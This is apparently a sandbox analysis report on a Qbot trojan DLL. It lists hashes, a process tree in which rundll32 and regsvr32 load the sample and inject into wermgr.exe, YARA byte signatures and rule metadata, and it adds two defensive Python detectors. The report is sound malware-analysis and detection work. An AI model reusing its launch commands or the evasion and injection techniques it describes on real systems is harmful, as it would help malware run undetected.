Windows Analysis Report
pebbles.dat.dll

Overview

General Information

Sample Name: pebbles.dat.dll
Analysis ID: 715156
MD5: d89521adaf6418e6ebe43b1a1a9d2af9
SHA1: 38cac8495ef43e51cdac1cb5e85d10137b365bee
SHA256: 1965dc57456d4fc01b6ce0f242d80776fe08a16354e6177255cba618348355ac
Tags: dll

Detection

Qbot
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Entry point lies outside standard sections
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Registers a DLL
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5860 cmdline: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5896 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5916 cmdline: rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 5996 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • regsvr32.exe (PID: 5904 cmdline: regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • wermgr.exe (PID: 5988 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5924 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 6004 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 5968 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6040 cmdline: rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
No configs have been found
Yara matches (memory dumps)

Source | Rule | Description | Author
00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  Strings:
  • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp | Windows_Trojan_Qbot_3074a8d4 | unknown | unknown
  Strings:
  • 0x1ca14:$a4: %u;%u;%u;
  • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
  • 0x1cdd8:$a6: %u&%s&%u
  • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
  • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
  • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
  • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
  • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  Strings:
  • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
Yara matches (unpacked PEs)

Source | Rule | Description | Author
8.2.wermgr.exe.2d40000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
8.2.wermgr.exe.2d40000.0.raw.unpack | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  Strings:
  • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
8.2.wermgr.exe.2d40000.0.raw.unpack | Windows_Trojan_Qbot_3074a8d4 | unknown | unknown
  Strings:
  • 0x1ca14:$a4: %u;%u;%u;
  • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
  • 0x1cdd8:$a6: %u&%s&%u
  • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
  • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
  • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
  • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
  • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
8.0.wermgr.exe.2d40000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
8.0.wermgr.exe.2d40000.0.unpack | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
  Strings:
  • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
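The "Strings" column above records, for each YARA string, the offset at which it was found in the dump. The following is an added example for this page, not code from Joe Sandbox or from the Elastic rule set: a stand-alone scanner that compiles YARA-style strings (plain text strings, hex strings with `??`/nibble wildcards and `[n-m]` jumps) into byte regexes and lists every (offset, name) hit in a buffer, so a hit can be re-checked offline on a memory dump without yara installed. The string names and bytes are copied from the Windows_Trojan_Qbot_3074a8d4 rows; the rule's real condition is not shown on the page, so the "any of them" condition in `rule_matches()` is an assumption, and the dump is a constructed zero-filled region with four of those strings written at the offsets the report lists.

```python
"""Re-check YARA string hits against a memory dump, offline (added example)."""
import re
from typing import Dict, List, Tuple

# Identifiers and bytes copied from the Windows_Trojan_Qbot_3074a8d4 hits in the report.
QBOT_3074A8D4_STRINGS: Dict[str, str] = {
    "$a4": "%u;%u;%u;",
    "$a5": "%u.%u.%u.%u.%u.%u.%04x",
    "$a6": "%u&%s&%u",
    "$get_string1": "{33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16}",
    "$set_key": "{8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8}",
    "$do_computer_use_russian_like_keyboard": "{B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D}",
}

_JUMP = re.compile(r"\[(\d+)(?:-(\d+))?\]")
_HEXCHARS = set("0123456789abcdefABCDEF?")


def _byte_class(tok: str) -> bytes:
    """One hex token ('8D', '??', '?A', 'A?') -> regex fragment matching that byte."""
    hi, lo = tok[0], tok[1]
    candidates = [v for v in range(256)
                  if (hi == "?" or (v >> 4) == int(hi, 16))
                  and (lo == "?" or (v & 0xF) == int(lo, 16))]
    if len(candidates) == 256:
        return b"."                      # '??': any byte
    if len(candidates) == 1:
        return re.escape(bytes(candidates))
    return b"[" + b"".join(re.escape(bytes([v])) for v in candidates) + b"]"


def compile_yara_string(spec: str) -> "re.Pattern[bytes]":
    """Compile one YARA string into a zero-width regex, so overlapping hits are all
    reported as YARA does. '{ ... }' is a hex string; anything else is a plain
    (case-sensitive, non-wide) text string."""
    if spec.startswith("{") and spec.endswith("}"):
        body = b""
        for tok in spec[1:-1].split():
            jump = _JUMP.fullmatch(tok)
            if jump:
                lo = int(jump.group(1))
                hi = int(jump.group(2) or lo)
                body += b".{%d,%d}" % (lo, hi)
            elif len(tok) == 2 and set(tok) <= _HEXCHARS:
                body += _byte_class(tok)
            else:
                raise ValueError(f"unsupported hex-string token {tok!r}")
    else:
        body = re.escape(spec.encode("latin-1"))
    return re.compile(b"(?=" + body + b")", re.DOTALL)


def scan(buffer: bytes, strings: Dict[str, str]) -> List[Tuple[int, str]]:
    """All (offset, string name) hits, sorted by offset."""
    hits: List[Tuple[int, str]] = []
    for name, spec in strings.items():
        hits.extend((m.start(), name) for m in compile_yara_string(spec).finditer(buffer))
    return sorted(hits)


def rule_matches(buffer: bytes, strings: Dict[str, str]) -> bool:
    """Assumed condition: any of them (the real condition is not on the page)."""
    return bool(scan(buffer, strings))


def build_sample_dump() -> bytes:
    """Constructed stand-in for an unpacked region: zeros, with four of the report's
    strings written at the offsets the report lists for them."""
    buf = bytearray(0x20000)
    for off, data in (
        (0x9004, bytes.fromhex("8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8")),
        (0x1ca14, b"%u;%u;%u;\x00"),
        (0x1cf50, b"%u.%u.%u.%u.%u.%u.%04x\x00"),
        (0x1cdd8, b"%u&%s&%u\x00"),
    ):
        buf[off:off + len(data)] = data
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample_dump()
    for off, name in scan(dump, QBOT_3074A8D4_STRINGS):
        print(f"0x{off:x}:{name}")
    # A looser, hypothetical $set_key with wildcards and a jump still hits at 0x9004.
    loose = compile_yara_string("{8D 87 ?? ?? 00 00 50 56 [4-6] 59}")
    print("loose $set_key hit:", loose.search(dump) is not None)
```

The lookahead wrapper is what makes the offsets agree with YARA: a plain `finditer` skips hits that overlap a previous one. Hex strings with alternatives (`( A | B )`) and text-string modifiers (`wide`, `nocase`) are not handled; the scanner raises on tokens it does not understand rather than silently mis-scanning.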

          Data Obfuscation

Sigma rule: Execute DLL with spoofed extension
Source: Process started | Author: Joe Security | Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5860, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1, ProcessId: 5896, ProcessName: cmd.exe
          No Snort rule has matched
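The process tree and the Sigma hit above show two things a detection engineer can key on: rundll32.exe/regsvr32.exe loading a module whose name carries a data-file extension (pebbles.dat.dll), and wermgr.exe being started by those loaders, the process Qbot injected into in this run. The following is an added example for this page, not Joe Security's Sigma rule (whose logic is not reproduced on the page): process-creation events rebuilt from the tree, plus three constructed benign controls (PIDs 4242-4244), run through two checks written from that reading. The disguise-extension list, the expected-extension list and the assumption that no legitimate flow starts wermgr.exe from rundll32/regsvr32 are mine.

```python
"""Process-creation checks for the behaviour in the report's process tree (added example)."""
import ntpath  # parses Windows paths on any host OS
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


LOADERS = {"rundll32.exe", "regsvr32.exe"}
# Extensions these loaders legitimately load (assumption); anything else is spoofed.
EXPECTED_LAST = {"dll", "ocx", "cpl", "ax"}
# Inner extensions that make a double-extension name look like a data file (assumption).
# Names like vendor.core.dll are common and must not fire, so only these inner parts do.
DISGUISE_EXTS = {"dat", "txt", "jpg", "jpeg", "png", "gif", "pdf", "doc", "tmp", "log", "bin"}

_ARG = re.compile(r'"[^"]*"\S*|\S+')   # one command-line argument, quotes kept together


def loader_module(cmdline: str) -> Optional[str]:
    """Path passed to rundll32/regsvr32 anywhere in the command line, so
    `cmd.exe /C rundll32.exe ...` is handled the way the report's Sigma hit was.
    Switches (/s, -s) are skipped and a ',EntryPoint' suffix is dropped."""
    args = [a.replace('"', "") for a in _ARG.findall(cmdline)]
    for i, arg in enumerate(args):
        if ntpath.basename(arg).lower() in LOADERS:
            for nxt in args[i + 1:]:
                if nxt.startswith(("/", "-")):
                    continue
                return nxt.split(",", 1)[0]
            return None
    return None


def extensions(path: str) -> List[str]:
    """Every dotted suffix of the file name: pebbles.dat.dll -> ['dat', 'dll']."""
    return ntpath.basename(path).lower().split(".")[1:]


def naive_non_dll_check(path: str) -> bool:
    """The obvious test. It is False for pebbles.dat.dll, which is the point."""
    return not path.lower().endswith(".dll")


def spoofed_extension(path: str) -> bool:
    """Final extension is not a loadable type, or a disguise extension sits inside."""
    exts = extensions(path)
    if not exts or exts[-1] not in EXPECTED_LAST:
        return True
    return any(e in DISGUISE_EXTS for e in exts[:-1])


def wermgr_from_loader(ev: ProcEvent) -> bool:
    """wermgr.exe whose parent is rundll32/regsvr32: the injection observable in the tree."""
    return (ntpath.basename(ev.image).lower() == "wermgr.exe"
            and ntpath.basename(ev.parent_image).lower() in LOADERS)


def detect(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """(pid, finding, detail) for every event that trips a check."""
    findings: List[Tuple[int, str, str]] = []
    for ev in events:
        module = loader_module(ev.cmdline)
        if module is not None and spoofed_extension(module):
            findings.append((ev.pid, "spoofed-extension", module))
        if wermgr_from_loader(ev):
            findings.append((ev.pid, "wermgr-from-loader", ev.parent_image))
    return findings


# Events rebuilt from the report's process tree (PIDs, images, command lines, parents
# as listed there), followed by three constructed benign controls.
S32, W64 = r"C:\Windows\System32", r"C:\Windows\SysWOW64"
EVENTS = [
    ProcEvent(5896, W64 + r"\cmd.exe", r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1', S32 + r"\loaddll32.exe"),
    ProcEvent(5916, W64 + r"\rundll32.exe", r'rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1', W64 + r"\cmd.exe"),
    ProcEvent(5996, W64 + r"\wermgr.exe", W64 + r"\wermgr.exe", W64 + r"\rundll32.exe"),
    ProcEvent(5904, W64 + r"\regsvr32.exe", r"regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll", S32 + r"\loaddll32.exe"),
    ProcEvent(5988, W64 + r"\wermgr.exe", W64 + r"\wermgr.exe", W64 + r"\regsvr32.exe"),
    ProcEvent(5924, W64 + r"\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer", S32 + r"\loaddll32.exe"),
    ProcEvent(6040, W64 + r"\rundll32.exe", r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable", S32 + r"\loaddll32.exe"),
    # constructed controls: ordinary rundll32/regsvr32 use and wermgr.exe from svchost.exe
    ProcEvent(4242, S32 + r"\rundll32.exe", r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe"),
    ProcEvent(4243, S32 + r"\regsvr32.exe", r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.core.dll"', S32 + r"\msiexec.exe"),
    ProcEvent(4244, S32 + r"\wermgr.exe", S32 + r"\wermgr.exe", S32 + r"\svchost.exe"),
]

if __name__ == "__main__":
    for pid, finding, detail in detect(EVENTS):
        print(f"PID {pid}: {finding} ({detail})")
```

The double-extension check is deliberately narrow: flagging every `a.b.dll` would page on half the .NET assemblies on a host, so only the inner extensions in `DISGUISE_EXTS` count, and a module with no recognised final extension at all is flagged regardless. The parent check fires on the two wermgr.exe children in the tree and nothing else.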


          AV Detection

Source: pebbles.dat.dll | ReversingLabs: Detection: 16%
Source: pebbles.dat.dll | Joe Sandbox ML: detected
Source: pebbles.dat.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: pebbles.dat.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: E:\cpp\out\out\desktop.pdb | source: regsvr32.exe, 00000003.00000002.252814839.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.253212407.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.252999477.000000006D954000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
Source: Binary string: amstream.pdb | source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL | source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0316C123 FindFirstFileW,FindNextFileW | 3_2_0316C123
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0346C123 FindFirstFileW,FindNextFileW | 4_2_0346C123
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_03165D1E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject | 3_2_03165D1E

          System Summary

Every source below matched both Elastic rules (Author: unknown for each).

Source | Type | Matched rules
8.2.wermgr.exe.2d40000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
8.0.wermgr.exe.2d40000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
3.3.regsvr32.exe.3140000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
5.3.rundll32.exe.4a40000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
7.0.wermgr.exe.2c60000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
4.3.rundll32.exe.32e0000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
5.2.rundll32.exe.4a60000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
4.2.rundll32.exe.3460000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
8.0.wermgr.exe.2d40000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
7.2.wermgr.exe.2c60000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
3.3.regsvr32.exe.3140000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
5.2.rundll32.exe.4a60000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
3.2.regsvr32.exe.3160000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
5.3.rundll32.exe.4a40000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
8.2.wermgr.exe.2d40000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
4.2.rundll32.exe.3460000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
9.0.wermgr.exe.29b0000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
9.0.wermgr.exe.29b0000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
7.2.wermgr.exe.2c60000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
3.2.regsvr32.exe.3160000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
7.0.wermgr.exe.2c60000.0.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
4.3.rundll32.exe.32e0000.0.raw.unpack | UNPACKEDPE | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp | MEMORY | Windows_Trojan_Qbot_92c67a6d, Windows_Trojan_Qbot_3074a8d4
Source: pebbles.dat.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Rule metadata for the unpacked PE matches. Each of the following sources (type: UNPACKEDPE) matched both rules:
8.2.wermgr.exe.2d40000.0.raw.unpack, 8.0.wermgr.exe.2d40000.0.unpack, 3.3.regsvr32.exe.3140000.0.raw.unpack, 5.3.rundll32.exe.4a40000.0.raw.unpack, 7.0.wermgr.exe.2c60000.0.raw.unpack, 4.3.rundll32.exe.32e0000.0.unpack, 5.2.rundll32.exe.4a60000.0.raw.unpack, 4.2.rundll32.exe.3460000.0.raw.unpack, 8.0.wermgr.exe.2d40000.0.raw.unpack, 7.2.wermgr.exe.2c60000.0.unpack, 3.3.regsvr32.exe.3140000.0.unpack, 5.2.rundll32.exe.4a60000.0.unpack, 3.2.regsvr32.exe.3160000.0.raw.unpack, 5.3.rundll32.exe.4a40000.0.unpack, 8.2.wermgr.exe.2d40000.0.unpack, 4.2.rundll32.exe.3460000.0.unpack

Windows_Trojan_Qbot_92c67a6d: reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23

Windows_Trojan_Qbot_3074a8d4: reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.29b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 9.0.wermgr.exe.29b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.2.wermgr.exe.2c60000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
